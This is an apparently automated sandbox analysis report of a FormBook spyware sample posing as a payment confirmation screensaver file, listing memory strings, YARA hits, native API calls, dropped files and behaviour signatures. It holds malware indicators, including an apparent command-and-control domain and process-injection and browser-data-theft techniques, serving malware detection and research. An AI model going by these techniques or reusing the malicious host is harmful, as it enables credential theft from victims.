Source: Payent confirmation copy 00888754087.scr	String found in binary or memory: http://crl.comodoca.com/COMODORSACodeSigningCA.crl0t
Source: m0tdggs3TGEEG.exe, 00000007.00000002.867134338.000000000423C000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: http://ibm-p8-kvm-03-guest-02.virt.pnr.lab.eng.rdu2.redhat.com/
Source: Payent confirmation copy 00888754087.scr	String found in binary or memory: http://ocsp.comodoca.com0
Source: Payent confirmation copy 00888754087.scr, 00000000.00000002.367300150.0000000002401000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: Payent confirmation copy 00888754087.scr	String found in binary or memory: http://tempuri.org/DataSet1.xsd
Source: m0tdggs3TGEEG.exe, 00000007.00000002.867501837.000000000502E000.00000040.80000000.00040000.00000000.sdmp	String found in binary or memory: http://www.jingdongpt.shop
Source: m0tdggs3TGEEG.exe, 00000007.00000002.867501837.000000000502E000.00000040.80000000.00040000.00000000.sdmp	String found in binary or memory: http://www.jingdongpt.shop/j64s/
Source: finger.exe, 00000006.00000002.868129541.0000000061EB9000.00000008.00000001.01000000.0000000C.sdmp, sqlite3.dll.6.dr	String found in binary or memory: http://www.sqlite.org/copyright.html.
Source: finger.exe, 00000006.00000003.439507427.0000000005D1E000.00000004.00000020.00020000.00000000.sdmp, 4ub-1K1Qxn.6.dr	String found in binary or memory: https://ac.ecosia.org/autocomplete?q=
Source: finger.exe, 00000006.00000002.867321380.0000000003F8E000.00000004.10000000.00040000.00000000.sdmp, m0tdggs3TGEEG.exe, 00000007.00000002.867134338.00000000043CE000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: https://ad.netowl.jp/js/star-errorpage.js?date=
Source: finger.exe, 00000006.00000003.439507427.0000000005D1E000.00000004.00000020.00020000.00000000.sdmp, 4ub-1K1Qxn.6.dr	String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
Source: finger.exe, 00000006.00000003.439507427.0000000005D1E000.00000004.00000020.00020000.00000000.sdmp, 4ub-1K1Qxn.6.dr	String found in binary or memory: https://duckduckgo.com/ac/?q=
Source: finger.exe, 00000006.00000003.439507427.0000000005D1E000.00000004.00000020.00020000.00000000.sdmp, 4ub-1K1Qxn.6.dr	String found in binary or memory: https://duckduckgo.com/chrome_newtab
Source: finger.exe, 00000006.00000003.439507427.0000000005D1E000.00000004.00000020.00020000.00000000.sdmp, 4ub-1K1Qxn.6.dr	String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
Source: finger.exe, 00000006.00000002.867321380.0000000002CB6000.00000004.10000000.00040000.00000000.sdmp, m0tdggs3TGEEG.exe, 00000007.00000002.867134338.00000000030F6000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: https://error.skycloud.tw/system/error?code=400
Source: finger.exe, 00000006.00000003.439507427.0000000005D1E000.00000004.00000020.00020000.00000000.sdmp, 4ub-1K1Qxn.6.dr	String found in binary or memory: https://search.yahoo.com/favicon.icohttps://search.yahoo.com/search
Source: finger.exe, 00000006.00000003.439507427.0000000005D1E000.00000004.00000020.00020000.00000000.sdmp, 4ub-1K1Qxn.6.dr	String found in binary or memory: https://search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
Source: Payent confirmation copy 00888754087.scr	String found in binary or memory: https://www.chiark.greenend.org.uk/~sgtatham/putty/0
Source: 4ub-1K1Qxn.6.dr	String found in binary or memory: https://www.google.com/favicon.ico
Source: finger.exe, 00000006.00000002.867321380.0000000003F8E000.00000004.10000000.00040000.00000000.sdmp, m0tdggs3TGEEG.exe, 00000007.00000002.867134338.00000000043CE000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: https://www.star.ne.jp/

E-Banking Fraud

Yara detected FormBook

Source: Yara match	File source: 3.2.RegSvcs.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000003.00000002.388663997.0000000000300000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000002.453623702.00000000002E0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.867501837.0000000004FB0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.866945987.0000000000260000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.388713331.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.866925656.00000000001C0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.866906811.0000000000090000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.389129040.0000000001720000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.867129068.0000000003370000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY

Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)

Source: C:\Users\user\Desktop\Payent confirmation copy 00888754087.scr	Memory allocated: 770B0000 page execute and read and write	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Memory allocated: 770B0000 page execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\finger.exe	Memory allocated: 770B0000 page execute and read and write	Jump to behavior

Contains functionality to call native functions

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 3_2_0042CE23 NtClose,	3_2_0042CE23
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 3_2_00A307AC NtCreateMutant,LdrInitializeThunk,	3_2_00A307AC
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 3_2_00A2F9F0 NtClose,LdrInitializeThunk,	3_2_00A2F9F0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 3_2_00A2FAE8 NtQueryInformationProcess,LdrInitializeThunk,	3_2_00A2FAE8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 3_2_00A2FB68 NtFreeVirtualMemory,LdrInitializeThunk,	3_2_00A2FB68
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 3_2_00A2FDC0 NtQuerySystemInformation,LdrInitializeThunk,	3_2_00A2FDC0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 3_2_00A300C4 NtCreateFile,	3_2_00A300C4
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 3_2_00A30060 NtQuerySection,	3_2_00A30060
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 3_2_00A30078 NtResumeThread,	3_2_00A30078
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 3_2_00A30048 NtProtectVirtualMemory,	3_2_00A30048
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 3_2_00A301D4 NtSetValueKey,	3_2_00A301D4
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 3_2_00A3010C NtOpenDirectoryObject,	3_2_00A3010C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 3_2_00A30C40 NtGetContextThread,	3_2_00A30C40
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 3_2_00A310D0 NtOpenProcessToken,	3_2_00A310D0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 3_2_00A31148 NtOpenThread,	3_2_00A31148
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 3_2_00A2F8CC NtWaitForSingleObject,	3_2_00A2F8CC
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 3_2_00A31930 NtSetContextThread,	3_2_00A31930
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 3_2_00A2F938 NtWriteFile,	3_2_00A2F938
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 3_2_00A2F900 NtReadFile,	3_2_00A2F900
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 3_2_00A2FAB8 NtQueryValueKey,	3_2_00A2FAB8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 3_2_00A2FAD0 NtAllocateVirtualMemory,	3_2_00A2FAD0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 3_2_00A2FA20 NtQueryInformationFile,	3_2_00A2FA20
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 3_2_00A2FA50 NtEnumerateValueKey,	3_2_00A2FA50
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 3_2_00A2FBB8 NtQueryInformationToken,	3_2_00A2FBB8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 3_2_00A2FBE8 NtQueryVirtualMemory,	3_2_00A2FBE8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 3_2_00A2FB50 NtCreateKey,	3_2_00A2FB50
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 3_2_00A2FC90 NtUnmapViewOfSection,	3_2_00A2FC90
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 3_2_00A2FC30 NtOpenProcess,	3_2_00A2FC30
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 3_2_00A2FC60 NtMapViewOfSection,	3_2_00A2FC60
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 3_2_00A2FC48 NtSetInformationFile,	3_2_00A2FC48
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 3_2_00A31D80 NtSuspendThread,	3_2_00A31D80
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 3_2_00A2FD8C NtDelayExecution,	3_2_00A2FD8C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 3_2_00A2FD5C NtEnumerateKey,	3_2_00A2FD5C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 3_2_00A2FEA0 NtReadVirtualMemory,	3_2_00A2FEA0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 3_2_00A2FED0 NtAdjustPrivilegesToken,	3_2_00A2FED0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 3_2_00A2FE24 NtWriteVirtualMemory,	3_2_00A2FE24
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 3_2_00A2FFB4 NtCreateSection,	3_2_00A2FFB4
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 3_2_00A2FFFC NtCreateProcessEx,	3_2_00A2FFFC
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 3_2_00A2FF34 NtQueueApcThread,	3_2_00A2FF34

Detected potential crypto function

Source: C:\Users\user\Desktop\Payent confirmation copy 00888754087.scr	Code function: 0_2_001D0494	0_2_001D0494
Source: C:\Users\user\Desktop\Payent confirmation copy 00888754087.scr	Code function: 0_2_001D7908	0_2_001D7908
Source: C:\Users\user\Desktop\Payent confirmation copy 00888754087.scr	Code function: 0_2_001D8968	0_2_001D8968
Source: C:\Users\user\Desktop\Payent confirmation copy 00888754087.scr	Code function: 0_2_001DF310	0_2_001DF310
Source: C:\Users\user\Desktop\Payent confirmation copy 00888754087.scr	Code function: 0_2_001DF748	0_2_001DF748
Source: C:\Users\user\Desktop\Payent confirmation copy 00888754087.scr	Code function: 0_2_001D0898	0_2_001D0898
Source: C:\Users\user\Desktop\Payent confirmation copy 00888754087.scr	Code function: 0_2_001DFB71	0_2_001DFB71
Source: C:\Users\user\Desktop\Payent confirmation copy 00888754087.scr	Code function: 0_2_001DFB80	0_2_001DFB80
Source: C:\Users\user\Desktop\Payent confirmation copy 00888754087.scr	Code function: 0_2_001DEED8	0_2_001DEED8
Source: C:\Users\user\Desktop\Payent confirmation copy 00888754087.scr	Code function: 0_2_00402E34	0_2_00402E34
Source: C:\Users\user\Desktop\Payent confirmation copy 00888754087.scr	Code function: 0_2_004000F0	0_2_004000F0
Source: C:\Users\user\Desktop\Payent confirmation copy 00888754087.scr	Code function: 0_2_001D1242	0_2_001D1242
Source: C:\Users\user\Desktop\Payent confirmation copy 00888754087.scr	Code function: 0_2_001D04E4	0_2_001D04E4
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 3_2_00418C73	3_2_00418C73
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 3_2_004014F0	3_2_004014F0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 3_2_004030F0	3_2_004030F0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 3_2_00401200	3_2_00401200
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 3_2_00410413	3_2_00410413
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 3_2_004044F7	3_2_004044F7
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 3_2_0042F4A3	3_2_0042F4A3
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 3_2_00402560	3_2_00402560
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 3_2_0040E643	3_2_0040E643
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 3_2_00410633	3_2_00410633
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 3_2_00416E83	3_2_00416E83
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 3_2_0040E790	3_2_0040E790
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 3_2_0040E793	3_2_0040E793
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 3_2_00A3E0C6	3_2_00A3E0C6
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 3_2_00A3E2E9	3_2_00A3E2E9
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 3_2_00AE63BF	3_2_00AE63BF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 3_2_00A663DB	3_2_00A663DB
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 3_2_00A42305	3_2_00A42305
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 3_2_00A8A37B	3_2_00A8A37B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 3_2_00AC443E	3_2_00AC443E
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 3_2_00AC05E3	3_2_00AC05E3
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 3_2_00A5C5F0	3_2_00A5C5F0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 3_2_00A86540	3_2_00A86540
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 3_2_00A44680	3_2_00A44680
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 3_2_00A4E6C1	3_2_00A4E6C1
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 3_2_00AE2622	3_2_00AE2622
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 3_2_00A8A634	3_2_00A8A634
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 3_2_00A4C7BC	3_2_00A4C7BC
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 3_2_00A6286D	3_2_00A6286D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 3_2_00A4C85C	3_2_00A4C85C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 3_2_00A429B2	3_2_00A429B2
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 3_2_00AE098E	3_2_00AE098E
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 3_2_00AD49F5	3_2_00AD49F5
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 3_2_00A569FE	3_2_00A569FE
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 3_2_00A8C920	3_2_00A8C920
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 3_2_00AECBA4	3_2_00AECBA4
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 3_2_00AC6BCB	3_2_00AC6BCB
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 3_2_00AE2C9C	3_2_00AE2C9C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 3_2_00ACAC5E	3_2_00ACAC5E
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 3_2_00A70D3B	3_2_00A70D3B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 3_2_00A4CD5B	3_2_00A4CD5B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 3_2_00A72E2F	3_2_00A72E2F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 3_2_00A5EE4C	3_2_00A5EE4C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 3_2_00ADCFB1	3_2_00ADCFB1
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 3_2_00AB2FDC	3_2_00AB2FDC
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 3_2_00A50F3F	3_2_00A50F3F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 3_2_00A6D005	3_2_00A6D005
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 3_2_00ABD06D	3_2_00ABD06D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 3_2_00A43040	3_2_00A43040
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 3_2_00A5905A	3_2_00A5905A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 3_2_00ACD13F	3_2_00ACD13F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 3_2_00AE1238	3_2_00AE1238
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 3_2_00A3F3CF	3_2_00A3F3CF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 3_2_00A47353	3_2_00A47353
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 3_2_00A75485	3_2_00A75485
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 3_2_00A51489	3_2_00A51489
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 3_2_00A7D47D	3_2_00A7D47D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 3_2_00AE35DA	3_2_00AE35DA
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 3_2_00A4351F	3_2_00A4351F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 3_2_00AC579A	3_2_00AC579A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 3_2_00A757C3	3_2_00A757C3
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 3_2_00AD771D	3_2_00AD771D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 3_2_00ADF8EE	3_2_00ADF8EE
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 3_2_00ABF8C4	3_2_00ABF8C4
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 3_2_00AC394B	3_2_00AC394B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 3_2_00AC5955	3_2_00AC5955
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 3_2_00AF3A83	3_2_00AF3A83
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 3_2_00A3FBD7	3_2_00A3FBD7
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 3_2_00ACDBDA	3_2_00ACDBDA
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 3_2_00A67B00	3_2_00A67B00
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 3_2_00ADFDDD	3_2_00ADFDDD
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 3_2_00ACBF14	3_2_00ACBF14
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 3_2_00A6DF7C	3_2_00A6DF7C
Source: C:\Windows\SysWOW64\finger.exe	Code function: 6_2_61E95B4B	6_2_61E95B4B
Source: C:\Windows\SysWOW64\finger.exe	Code function: 6_2_61E49154	6_2_61E49154
Source: C:\Windows\SysWOW64\finger.exe	Code function: 6_2_61E42303	6_2_61E42303
Source: C:\Windows\SysWOW64\finger.exe	Code function: 6_2_61E5C4BF	6_2_61E5C4BF
Source: C:\Windows\SysWOW64\finger.exe	Code function: 6_2_61E496D7	6_2_61E496D7
Source: C:\Windows\SysWOW64\finger.exe	Code function: 6_2_61E7A6D0	6_2_61E7A6D0
Source: C:\Windows\SysWOW64\finger.exe	Code function: 6_2_61E469E8	6_2_61E469E8
Source: C:\Windows\SysWOW64\finger.exe	Code function: 6_2_61E43923	6_2_61E43923
Source: C:\Windows\SysWOW64\finger.exe	Code function: 6_2_61E398B9	6_2_61E398B9
Source: C:\Windows\SysWOW64\finger.exe	Code function: 6_2_61E30BC6	6_2_61E30BC6
Source: C:\Windows\SysWOW64\finger.exe	Code function: 6_2_61E1FA30	6_2_61E1FA30
Source: C:\Windows\SysWOW64\finger.exe	Code function: 6_2_61E4BDFA	6_2_61E4BDFA
Source: C:\Windows\SysWOW64\finger.exe	Code function: 6_2_61E26D8F	6_2_61E26D8F
Source: C:\Windows\SysWOW64\finger.exe	Code function: 6_2_61E17CC0	6_2_61E17CC0
Source: C:\Windows\SysWOW64\finger.exe	Code function: 6_2_61E35C3D	6_2_61E35C3D
Source: C:\Windows\SysWOW64\finger.exe	Code function: 6_2_61E44EC4	6_2_61E44EC4

Dropped file seen in connection with other malware

Source: Joe Sandbox View

Dropped File: C:\Users\user\AppData\Local\Temp\sqlite3.dll 79F86C1EDBBC69652A03A0F5667B3985BCF1E19F16FA3B8C7934E5B97AB8586D

Found potential string decryption / allocating functions

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: String function: 00A8373B appears 253 times
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: String function: 00A83F92 appears 132 times
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: String function: 00A3E2A8 appears 60 times
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: String function: 00AAF970 appears 84 times
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: String function: 00A3DF5C appears 137 times

PE / OLE file has an invalid certificate

Source: Payent confirmation copy 00888754087.scr

Static PE information: invalid certificate

PE file contains more sections than normal

Source: sqlite3.dll.6.dr

Static PE information: Number of sections : 18 > 10

Sample file is different than original file name gathered from version info

Source: Payent confirmation copy 00888754087.scr, 00000000.00000002.366246314.0000000000864000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameclr.dllT vs Payent confirmation copy 00888754087.scr
Source: Payent confirmation copy 00888754087.scr, 00000000.00000002.366062823.0000000000410000.00000004.08000000.00040000.00000000.sdmp	Binary or memory string: OriginalFilenameTL.dll" vs Payent confirmation copy 00888754087.scr
Source: Payent confirmation copy 00888754087.scr, 00000000.00000002.369909193.0000000005210000.00000004.08000000.00040000.00000000.sdmp	Binary or memory string: OriginalFilenameMontero.dll8 vs Payent confirmation copy 00888754087.scr
Source: Payent confirmation copy 00888754087.scr, 00000000.00000002.367300150.0000000002401000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilename vs Payent confirmation copy 00888754087.scr
Source: Payent confirmation copy 00888754087.scr, 00000000.00000000.342344637.0000000000348000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: OriginalFilenameEVew.exe. vs Payent confirmation copy 00888754087.scr
Source: Payent confirmation copy 00888754087.scr, 00000000.00000002.367300150.00000000025B4000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameTL.dll" vs Payent confirmation copy 00888754087.scr
Source: Payent confirmation copy 00888754087.scr	Binary or memory string: OriginalFilenameEVew.exe. vs Payent confirmation copy 00888754087.scr

Searches the installation path of Mozilla Firefox

Source: C:\Windows\SysWOW64\finger.exe

Registry key queried: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Mozilla\Mozilla Firefox\52.0.1 (x86 en-US)\Main Install Directory

Jump to behavior

Uses 32bit PE files

Source: Payent confirmation copy 00888754087.scr

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: Payent confirmation copy 00888754087.scr

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: 0.2.Payent confirmation copy 00888754087.scr.3680078.3.raw.unpack, iCErSCKyoG3WA92F9d.cs	Security API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
Source: 0.2.Payent confirmation copy 00888754087.scr.3680078.3.raw.unpack, iCErSCKyoG3WA92F9d.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 0.2.Payent confirmation copy 00888754087.scr.5210000.6.raw.unpack, iCErSCKyoG3WA92F9d.cs	Security API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
Source: 0.2.Payent confirmation copy 00888754087.scr.5210000.6.raw.unpack, iCErSCKyoG3WA92F9d.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 0.2.Payent confirmation copy 00888754087.scr.5210000.6.raw.unpack, gdALg5DWZcE17EVr1l.cs	Security API names: System.IO.DirectoryInfo.SetAccessControl(System.Security.AccessControl.DirectorySecurity)
Source: 0.2.Payent confirmation copy 00888754087.scr.5210000.6.raw.unpack, gdALg5DWZcE17EVr1l.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 0.2.Payent confirmation copy 00888754087.scr.5210000.6.raw.unpack, gdALg5DWZcE17EVr1l.cs	Security API names: System.Security.AccessControl.FileSystemSecurity.AddAccessRule(System.Security.AccessControl.FileSystemAccessRule)
Source: 0.2.Payent confirmation copy 00888754087.scr.3680078.3.raw.unpack, gdALg5DWZcE17EVr1l.cs	Security API names: System.IO.DirectoryInfo.SetAccessControl(System.Security.AccessControl.DirectorySecurity)
Source: 0.2.Payent confirmation copy 00888754087.scr.3680078.3.raw.unpack, gdALg5DWZcE17EVr1l.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 0.2.Payent confirmation copy 00888754087.scr.3680078.3.raw.unpack, gdALg5DWZcE17EVr1l.cs	Security API names: System.Security.AccessControl.FileSystemSecurity.AddAccessRule(System.Security.AccessControl.FileSystemAccessRule)

Source: classification engine

Classification label: mal100.troj.spyw.evad.winSCR@9/8@20/12

Source: C:\Users\user\Desktop\Payent confirmation copy 00888754087.scr

